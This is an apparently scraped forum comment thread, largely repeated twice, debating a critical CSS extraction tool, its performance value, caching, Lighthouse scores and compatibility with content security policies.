Nice one. Would be cool if this also handled responsiveness. The need to dedupe responsive critical styles has made me resort to manually editing all critical stylesheets I've ever made.
I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.
> Place your original non-critical CSS <link> tags just before the closing </body> tag
I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).
the prefetch attribute and other HTTP header hints, combined with proper CDN setups does almost the same. and would not require critical CSS to be nonstop rebuilt as the page develops. a properly configured CF is insanely fast.
When the stylesheet loads and is applied to the CSSOM it’s going to trigger layout and style calculations for the elements it’s applied to maybe even the whole page
Browsers are pretty eager at fetching stylesheets even those at the bottom of the page
Sure that work is going to happen but often what you see is multiple stylesheets loaded using the async hack which results in multiple style and layout calculations as the browser can coalesce them because it doesn’t know that they’re stylesheets or when they will arrive
The whole philosophy of critical styles philosophy being those about the fold is a mistake in my view
Far better to adopt approaches like those recommended by Andy Bell that dramatically reduces stylesheet size
And do critical styles “correctly” i.e. load those that are needed to render the initial page and load the ones that rely on interactions separately
Feels like premature optimisation to me. Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile? Maybe with the most complex web apps, I guess, but for almost all cases, I would have thought writing clean CSS, HTML, and JavaScript would render this unnecessary or even counterproductive.
Oh my god, yes, this is useful. I do some freelance dev work for a small marketing agency, and I inherit a lot of Wordpress sites that show all the hallmarks of passing through multiple developers/agencies over the years, and the CSS and Javascript are *always* crufty with years of accumulated bad practices. I'm eager to try this.
> Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile?
On the contrary, the more complex the css is or the more resources loaded, the less this would be worthwhile.
The thing i think they are trying to optimize is latency due to RTT. When you first request the html file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) css, the more expensive this optimisation is so the less likely it is a net benefit.
I would pay good money for this tool ~12 years ago. We had a site with enormous amounts of CSS that accumulated over the years and it was really unclear which rules are and which aren't critical
For many sites, this probably is a premature optimization. But for sites that live off of click-through, like news/media, getting the text on screen is critical. Bounce rate starts to go up and ad revenue drops as soon as page loads are less than "immediate", which is about 1 second. The full page can actually be quite heavy once all the ads, scripts, and media load.
We were doing this optimization more than a decade ago when I worked at HuffPost.
Seriously. When I look at the modern state of front-end development, it's actually fucking bonkers to me. Stuff like Lighthouse has caused people to reach for optimizations that are completely absurd.
This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project all for very minimal if any improvement for the hypothetical end user (who will be subject to much greater forces out of the developer's control like their network speed)
I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.
Yup. Give people a number or stat to obsess over and they'll obsess over it (while ignoring the more meaningful work like stability and fixing real, user-facing bugs).
Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.
It’s just a few meaningful numbers like 0 accessibility errors, A+ for the securityheaders, flawless result on webkolls 5july net plus below 1 second loading time on pagespeed mobile. Once that has been achieved obsessing over stabilizing a flaky bloat pudding while patching over bugs aka features that annoy any user will have died.
To me thinking about how CSS loads is task #1, but I probably have some unique needs.
We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.
I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after-the-fact. We made pretty much everything on the page load in-line including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed. I took all the advice Google Lighthouse was giving me, and implemented our pages in a way that satisfies it completely. It wasn't really that difficult but it required me changing my thinking about how to approach building websites.
We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.
If performance is the goal, there is no such thing as premature optimization, it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close, unless they put in the work and start thinking differently about the problem.
I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.
Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.
In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.
The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.
If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.
Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve lighting fast experience once you move away from shared hosting territory.
It's worth noting that including Critical CSS in every page load isn't the only way to use it.
A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.
> A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already
I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.
I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.
One useful trick to keep in mind is that CSS content-visibility only applies in certain scenarios. One agency I came across using <iframe> for every section is a bad idea.
So my conclusion is mobile-first CSS is generally more practical and use PWA which I'm building now for site that has lots of listings.
Yeah, it's a neat trick but kinda pointless. In a world with CDNs and HTTP/2, all this does is waste bandwidth in order to look slightly better in artificial benchmarks.
It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.
Yup, whereever we deviated from straightforward asset downloads to optimize something, we always end up slower or buggy. Like manually downloading display images or using websockets to upload stuff. Turns out servers and browsers have spent more person-years optimizing it better than me.
Imagine this: before serving the page, a filter seeks out the critical css, inserts it, and removes all css links. Greatly improving page load times and reducing CDN loads.
Edit: on second reading, it seems like you are saying when another page from the same server with the same style loads again, the css would have to be reloaded and This increases bandwidth in cases where a site visitor loads multiple pages. So yes it is optimum for conditions where the referrer is external to the site.
This is a footgun. You'll get a very consistent flash of unstyled content. It's not just an aesthetics issue -- when layout shifts in the middle of a page load, as your "non-critical" styles are applied, and user is interacting with something, it will kill your usability.
Unless you're sure that your the "non-critical" css doesn't cause layout shifts (aka, it doesn't overload any "critical" styles), you're gonna see layout shifts even on fast connections if you load some styles at the top of the document and then do a link rel at the bottom.
I mean, i agree with you that this is insanely easy to screw up. However in most websites there is obviously css which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.
I searched online for tools to extract the critical css of a website for one of my clients, I couldn't find one that did the job so I did so after using Puppeteer locally and then decided to share the solution I used that let's you specify how long to wait after page load to extract the styles; even found a paid one but requested refund after it didn't work.
Given there seem to be few other Critical CSS tools out there, its utility in driving web performance, and the fact Google's web.dev recommended tool (https://github.com/addyosmani/critical) uses penthouse under the hood, I'm surprised there isn't more effort and/or sponsorship going into helping maintain it.
I guess this just assumes that this is the first view of your page and no user has css resources cached?
Or maybe they are saying this would always be worth it?
I assume it'd be a trade off between a number of factors. How many returning vs new visitors? Is css served with proper cache-control headers, 103 early hints and in a cdn? How big is your critical css, and how much of your critical html does it push out of the initial congestion window?
I prefer a different approach: write your HTML in such a way that the page makes sense and is usable without CSS. It's also a good guiding star for your page's complexity; if your document markup is simple, sensible and meaningful, you're probably not overcomplicating your layout.
When I was doing performance examinations from localhost I found that CSS was mostly inconsequential if written at least vaguely efficiently and requested as early as possible from the HTML. By completely removing CSS I might be able to save up to 7ms of load time, but that was extremely hard to tell because that was well within the variance between test intervals.
Obviously trying to do an optimization designed to reduce the impact of latency between client <-> server is going to have no impact if you are testing on localhost where latency is already effectively zero.
That's not to say i think this optimization is neccesarily worth it, just that testing on localhost is not a good test of this.
I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.
With a deeper understanding of CSS, one would recognize that simply parsing it out for only the components "above the fold" (which, why are pixels being used here in such an assumptive manner?), completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character-widths, and so many other tools that would negate "needing" to do this in the first place.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
(It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore because I forgot I had that in there until I saw it now!)
I’ve been away for quite a while, so just a loud thinking.
With tools such as PostCSS, and servers serving zipped styles across CDN, maintaining a single request to the styles; does it really benefit from breaking up the styles these days?
Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.
For the critical CSS thing, we used to kinda do it by hand with some automation more as a toolset to help us decide how much to include (inside the HTML itself - `<styles>`) and then insert the stylesheet. But then, we always found it better to set a Stylesheet Budget and work with it.
CDNs haven't been cached across domains for years. I.e. using a CDN is no faster than a server serving it itself (usually slower because of DNS lookups, but sometimes slightly faster if the geolocation is closer if the DNS was already looked up).
The performance impact of CDNs are definitely a complicated matter and always have been. They aren't a magic solution to any problems unless you're exceeding the origin's available bandwidth, or are serving up something that should be cacheable but somehow can't live without whatever it is that Elementor does that makes it worth every request taking 75 seconds to complete.
I prepared a comment about how the whole thing should be well under 5KB uncompressed, plus four small images and a background video that I couldn’t quite figure out, and about how the loader made no sense and made things worse. But then I checked in Chromium before stopping, and discovered that apparently the website is just completely broken in Firefox for some reason, so that you only get to see the above-the-fold content. But it still definitely hasn’t earned the loader. And also demonstrates why messing with scrolling is a bad idea.
Non-starter for all but hobby websites since it's incompatible with any content security policy disallowing inline style tags.
Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds and they're all worth posting in the spirit of HN, however I am talking about CSPs that disallow shenanigans. Carry on though :^)
The threats solved by restricting CSS with CSP are pretty minor, but generally its to prevent injection attacks that do the following:
- injecting css to restyle the page as part of a social engineering attack or to otherwise trick the user into doing something stupid
- using css to load an image or something to track users viewing the page or capture their IP address
- leak the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).
On the whole though, the surface area is small compared to javascript. I often see people restrict css before js (or doing the js restrictions incorrectly) because restricting css is much easier, but that is really silly as an attacker will always reach for javascript first if its available.
If only this was about UGC. Most of it can have nothing to do with actual users. Think stuff like ads or other injects like a dependency of dependency of dependency of your frontend app compromised by a north korean hacker.
You could, but in the real world not every frontend dev has control over the CSP on the server allowing nonces to even be an option.
Even when they do they might be subject to a security audit forbidding it. There's two reasons nonces can suck: first is that nonces may be passed around for 3rd party script usage and that blows a hole in your security policy, and the other is that many implementations to generate nonces are not implemented correctly, so the security team might have less trust in devs.
It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.
I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.
Most of the CSS that gets used below the fold on a single page on most pages, gets used above it too. Especially when considering it needs to handle large desktop monitors, and responsiveness. And then remaining part (e.g. styling a footer) is tiny.
The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.
There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.
But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.
It reduces round-trips. The ultimate goal used to be (in the 2010s) to ensure the first tcp packet had everything the browser needed to render the layout without any additional round-trips. Rare to go that extreme these days, of course.
Is there any limit etc. It gives an error on my first try.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
This is a great idea even for a building step in web projects. You set a list of viewports you want to optimize for in your package.json, import critical-css as a dev dependency, configure it in your vite.config.js or equivalent, and way to go
the amount of tiny tweaks that stack up in css is kinda nuts tbh - always felt like chasing performance can be endless, makes me wonder if any dev really feels satisfied with their setup or if it's just a bunch of tradeoffs
Assuming you are using an atomic CSS based framework like tailwind, this would be unnecessary right ? Since all the CSS class names are anyways in-lined with the element.
That said, if all of your css is referenced by html classes, it would be trivial to look at the html that's above the fold and derive which css you need to load first which could be kinda cool.
If a candy or soda can go from 50g sugar to 40g without a significant change in flavor, they definitely want to. They don't have to get to 5g for it to be worthwhile.
Wordpress plugins and builders like Divi and Elementor has been inserting all css for every page part or component anywhere in the body for years. I hate it. But, thas this critical css means they have beeing doing it right all along?
No, having an external file makes it cacheable locally. If every new page loads some of the same css again and again, it's a waste of bandwith. You should already have the stylesheet on your computer by then.
This comes in handy with the bloated codebase I am running from, bravo.
My problem is the codebase I am running towards. I am making headway with scoped CSS, however, Firefox does not have it yet. I keep checking in on Firefox to see when that is going to support scoped CSS but I have not been able to determine what the hold up is.
Does anyone have scoped CSS working with a workaround or compromise for Firefox?
Nice one. Would be cool if this also handled responsiveness. The need to dedupe responsive critical styles has made me resort to manually editing all critical stylesheets I've ever made.
I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.
> Place your original non-critical CSS <link> tags just before the closing </body> tag
I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).
These days I'd recommend:
[0] https://web.dev/articles/preload-scannerunsafe-hashes is a decent alternative
the prefetch attribute and other HTTP header hints, combined with proper CDN setups does almost the same. and would not require critical CSS to be nonstop rebuilt as the page develops. a properly configured CF is insanely fast.
> HTTP header hints
Assume it's either 103 Early Hints or Resource Hints in HTTP/1.1 and 2.0.
+1 on responsiveness
I wouldn’t use the JS hack to load CSS…
When the stylesheet loads and is applied to the CSSOM it’s going to trigger layout and style calculations for the elements it’s applied to maybe even the whole page
Browsers are pretty eager at fetching stylesheets even those at the bottom of the page
That stylesheet application was going to happen anyway, the difference now is that FCP will occur before it.
> Browsers are pretty eager at fetching stylesheets even those at the bottom of the page
Browsers begin fetching resources as they discover them. For a big enough document, that will mean low placed resources will suffer.
Sure that work is going to happen but often what you see is multiple stylesheets loaded using the async hack which results in multiple style and layout calculations as the browser can coalesce them because it doesn’t know that they’re stylesheets or when they will arrive
The whole philosophy of critical styles philosophy being those about the fold is a mistake in my view
Far better to adopt approaches like those recommended by Andy Bell that dramatically reduces stylesheet size
And do critical styles “correctly” i.e. load those that are needed to render the initial page and load the ones that rely on interactions separately
Feels like premature optimisation to me. Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile? Maybe with the most complex web apps, I guess, but for almost all cases, I would have thought writing clean CSS, HTML, and JavaScript would render this unnecessary or even counterproductive.
Oh my god, yes, this is useful. I do some freelance dev work for a small marketing agency, and I inherit a lot of Wordpress sites that show all the hallmarks of passing through multiple developers/agencies over the years, and the CSS and Javascript are *always* crufty with years of accumulated bad practices. I'm eager to try this.
> Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile?
On the contrary, the more complex the css is or the more resources loaded, the less this would be worthwhile.
The thing i think they are trying to optimize is latency due to RTT. When you first request the html file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) css, the more expensive this optimisation is so the less likely it is a net benefit.
I would pay good money for this tool ~12 years ago. We had a site with enormous amounts of CSS that accumulated over the years and it was really unclear which rules are and which aren't critical
For many sites, this probably is a premature optimization. But for sites that live off of click-through, like news/media, getting the text on screen is critical. Bounce rate starts to go up and ad revenue drops as soon as page loads are less than "immediate", which is about 1 second. The full page can actually be quite heavy once all the ads, scripts, and media load.
We were doing this optimization more than a decade ago when I worked at HuffPost.
Seriously. When I look at the modern state of front-end development, it's actually fucking bonkers to me. Stuff like Lighthouse has caused people to reach for optimizations that are completely absurd.
This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project all for very minimal if any improvement for the hypothetical end user (who will be subject to much greater forces out of the developer's control like their network speed)
I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.
Yup. Give people a number or stat to obsess over and they'll obsess over it (while ignoring the more meaningful work like stability and fixing real, user-facing bugs).
Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.
It’s just a few meaningful numbers like 0 accessibility errors, A+ for the securityheaders, flawless result on webkolls 5july net plus below 1 second loading time on pagespeed mobile. Once that has been achieved obsessing over stabilizing a flaky bloat pudding while patching over bugs aka features that annoy any user will have died.
>Feels like premature optimisation to me.
To me thinking about how CSS loads is task #1, but I probably have some unique needs.
We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.
I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after-the-fact. We made pretty much everything on the page load in-line including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed. I took all the advice Google Lighthouse was giving me, and implemented our pages in a way that satisfies it completely. It wasn't really that difficult but it required me changing my thinking about how to approach building websites.
We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.
If performance is the goal, there is no such thing as premature optimization, it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close, unless they put in the work and start thinking differently about the problem.
I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.
When I tested mine, I got the following:
Built on Astro web framework
HTML: 27.52KB uncompressed (6.10KB compressed)
JS: <10KB (compressed)
Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.
In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.
The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.
If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.
Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve lighting fast experience once you move away from shared hosting territory.
It's worth noting that including Critical CSS in every page load isn't the only way to use it.
A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.
> A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already
I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.
I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.
One useful trick to keep in mind is that CSS content-visibility only applies in certain scenarios. One agency I came across using <iframe> for every section is a bad idea.
So my conclusion is mobile-first CSS is generally more practical and use PWA which I'm building now for site that has lots of listings.
Yeah, it's a neat trick but kinda pointless. In a world with CDNs and HTTP/2, all this does is waste bandwidth in order to look slightly better in artificial benchmarks.
It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.
Yup, whereever we deviated from straightforward asset downloads to optimize something, we always end up slower or buggy. Like manually downloading display images or using websockets to upload stuff. Turns out servers and browsers have spent more person-years optimizing it better than me.
And Critical CSS requires reducing the CSP (Content Security Policy), which I have already hardened almost entirely along with Permissions Policy.
Imagine this: before serving the page, a filter seeks out the critical css, inserts it, and removes all css links. Greatly improving page load times and reducing CDN loads.
Edit: on second reading, it seems like you are saying when another page from the same server with the same style loads again, the css would have to be reloaded and This increases bandwidth in cases where a site visitor loads multiple pages. So yes it is optimum for conditions where the referrer is external to the site.
This is a footgun. You'll get a very consistent flash of unstyled content. It's not just an aesthetics issue -- when layout shifts in the middle of a page load, as your "non-critical" styles are applied, and user is interacting with something, it will kill your usability.
isn't the whole point avoiding FOUC, while also avoiding to block the rendering for CSS network requests?
Unless you're sure that your the "non-critical" css doesn't cause layout shifts (aka, it doesn't overload any "critical" styles), you're gonna see layout shifts even on fast connections if you load some styles at the top of the document and then do a link rel at the bottom.
The critical css should cover everything above the fold to avoid that visible reflow.
Where’s the fold in a world of 000’s of viewports?
Then what does the "non-critical" css do?
The non-critical things?
I mean, i agree with you that this is insanely easy to screw up. However in most websites there is obviously css which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.
I searched online for tools to extract the critical css of a website for one of my clients, I couldn't find one that did the job so I did so after using Puppeteer locally and then decided to share the solution I used that let's you specify how long to wait after page load to extract the styles; even found a paid one but requested refund after it didn't work.
Feedback welcome, it's free for now.
What was the problem with something like https://www.npmjs.com/package/penthouse ?
It's worth noting that penthouse's last release is a few weeks shy of 3 years ago (https://github.com/pocketjoso/penthouse/releases/tag/v.2.3.3).
Given there seem to be few other Critical CSS tools out there, its utility in driving web performance, and the fact Google's web.dev recommended tool (https://github.com/addyosmani/critical) uses penthouse under the hood, I'm surprised there isn't more effort and/or sponsorship going into helping maintain it.
FYI: While a bit of an edge case, as I don’t know why anyone would do this realistically… If a site without CSS is passed, it throws an error.
Is the code somewhere? This seems like it'd be really useful as a Vite/Astro plugin
yeah, doing this manual copy-paste process every time you change something would count as cruel and unusual punishment
Is it the UI for penthouse lib? Settings look very similar :)
I guess this just assumes that this is the first view of your page and no user has css resources cached?
Or maybe they are saying this would always be worth it?
I assume it'd be a trade off between a number of factors. How many returning vs new visitors? Is css served with proper cache-control headers, 103 early hints and in a cdn? How big is your critical css, and how much of your critical html does it push out of the initial congestion window?
I prefer a different approach: write your HTML in such a way that the page makes sense and is usable without CSS. It's also a good guiding star for your page's complexity; if your document markup is simple, sensible and meaningful, you're probably not overcomplicating your layout.
This doesn't really work for sites where reading text left to right, top to bottom is not the primary focus.
When I was doing performance examinations from localhost I found that CSS was mostly inconsequential if written at least vaguely efficiently and requested as early as possible from the HTML. By completely removing CSS I might be able to save up to 7ms of load time, but that was extremely hard to tell because that was well within the variance between test intervals.
https://github.com/prettydiff/wisdom/blob/master/performance...
Obviously trying to do an optimization designed to reduce the impact of latency between client <-> server is going to have no impact if you are testing on localhost where latency is already effectively zero.
That's not to say i think this optimization is neccesarily worth it, just that testing on localhost is not a good test of this.
Not a fan.
I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.
With a deeper understanding of CSS, one would recognize that simply parsing it out for only the components "above the fold" (which, why are pixels being used here in such an assumptive manner?), completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character-widths, and so many other tools that would negate "needing" to do this in the first place.
Neat idea. I tried it on my site (https://anderegg.ca/) which already inlines its CSS, and got an error from the underlying library (https://www.npmjs.com/package/penthouse):
Hm. When I tried this on my site it retained a debugging element that is decidedly not required, but adds a lot of bytes to the CSS:
(It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore because I forgot I had that in there until I saw it now!)I’ve been away for quite a while, so just a loud thinking.
With tools such as PostCSS, and servers serving zipped styles across CDN, maintaining a single request to the styles; does it really benefit from breaking up the styles these days?
Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.
For the critical CSS thing, we used to kinda do it by hand with some automation more as a toolset to help us decide how much to include (inside the HTML itself - `<styles>`) and then insert the stylesheet. But then, we always found it better to set a Stylesheet Budget and work with it.
> serving zipped styles across CDN
CDNs haven't been cached across domains for years. I.e. using a CDN is no faster than a server serving it itself (usually slower because of DNS lookups, but sometimes slightly faster if the geolocation is closer if the DNS was already looked up).
The performance impact of CDNs are definitely a complicated matter and always have been. They aren't a magic solution to any problems unless you're exceeding the origin's available bandwidth, or are serving up something that should be cacheable but somehow can't live without whatever it is that Elementor does that makes it worth every request taking 75 seconds to complete.
Kind of funny that the agency that made this has a loader on their site.
It would only be ironic if they released a tool to get rid of loading on a page.
> Critical CSS refers to the minimal set of CSS rules required to render the visible portion of a webpage (above the fold).
In reality the tool is aimed to style most of the page without loading additional assets so you don't get a jarring repaint when visiting the site.
I prepared a comment about how the whole thing should be well under 5KB uncompressed, plus four small images and a background video that I couldn’t quite figure out, and about how the loader made no sense and made things worse. But then I checked in Chromium before stopping, and discovered that apparently the website is just completely broken in Firefox for some reason, so that you only get to see the above-the-fold content. But it still definitely hasn’t earned the loader. And also demonstrates why messing with scrolling is a bad idea.
Non-starter for all but hobby websites since it's incompatible with any content security policy disallowing inline style tags.
Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds and they're all worth posting in the spirit of HN, however I am talking about CSPs that disallow shenanigans. Carry on though :^)
You can allow safe inline CSS with a nonce. For example:
And a CSP like this Here's how I automate mine:https://github.com/uxtely/js-utils/blob/ad7d9531e108403a4146...
Its completely compatible, if you separate dynamic content until after the critical css is loaded: https://posts.summerti.me/being-unsafe-safely/
> content security policy disallowing inline style tags
Wait, why on earth is this a thing?
The threats solved by restricting CSS with CSP are pretty minor, but generally its to prevent injection attacks that do the following:
- injecting css to restyle the page as part of a social engineering attack or to otherwise trick the user into doing something stupid
- using css to load an image or something to track users viewing the page or capture their IP address
- leak the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).
On the whole though, the surface area is small compared to javascript. I often see people restrict css before js (or doing the js restrictions incorrectly) because restricting css is much easier, but that is really silly as an attacker will always reach for javascript first if its available.
I guess the main case is if user-generated content has an escape bug that lets the user inject a <style> tag?
If only this was about UGC. Most of it can have nothing to do with actual users. Think stuff like ads or other injects like a dependency of dependency of dependency of your frontend app compromised by a north korean hacker.
That’s a good point, though can’t this instance be whitelisted with a nonce?
You could, but in the real world not every frontend dev has control over the CSP on the server allowing nonces to even be an option.
Even when they do they might be subject to a security audit forbidding it. There's two reasons nonces can suck: first is that nonces may be passed around for 3rd party script usage and that blows a hole in your security policy, and the other is that many implementations to generate nonces are not implemented correctly, so the security team might have less trust in devs.
It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.
I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.
I don't really understand the point of this.
Most of the CSS that gets used below the fold on a single page on most pages, gets used above it too. Especially when considering it needs to handle large desktop monitors, and responsiveness. And then remaining part (e.g. styling a footer) is tiny.
The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.
There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.
But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.
It reduces round-trips. The ultimate goal used to be (in the 2010s) to ensure the first tcp packet had everything the browser needed to render the layout without any additional round-trips. Rare to go that extreme these days, of course.
Is there any limit etc. It gives an error on my first try.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
This is a great idea even for a building step in web projects. You set a list of viewports you want to optimize for in your package.json, import critical-css as a dev dependency, configure it in your vite.config.js or equivalent, and way to go
the amount of tiny tweaks that stack up in css is kinda nuts tbh - always felt like chasing performance can be endless, makes me wonder if any dev really feels satisfied with their setup or if it's just a bunch of tradeoffs
I am. I don't know if its perfect but it is more than good enough.
It will be great if it is package as a library
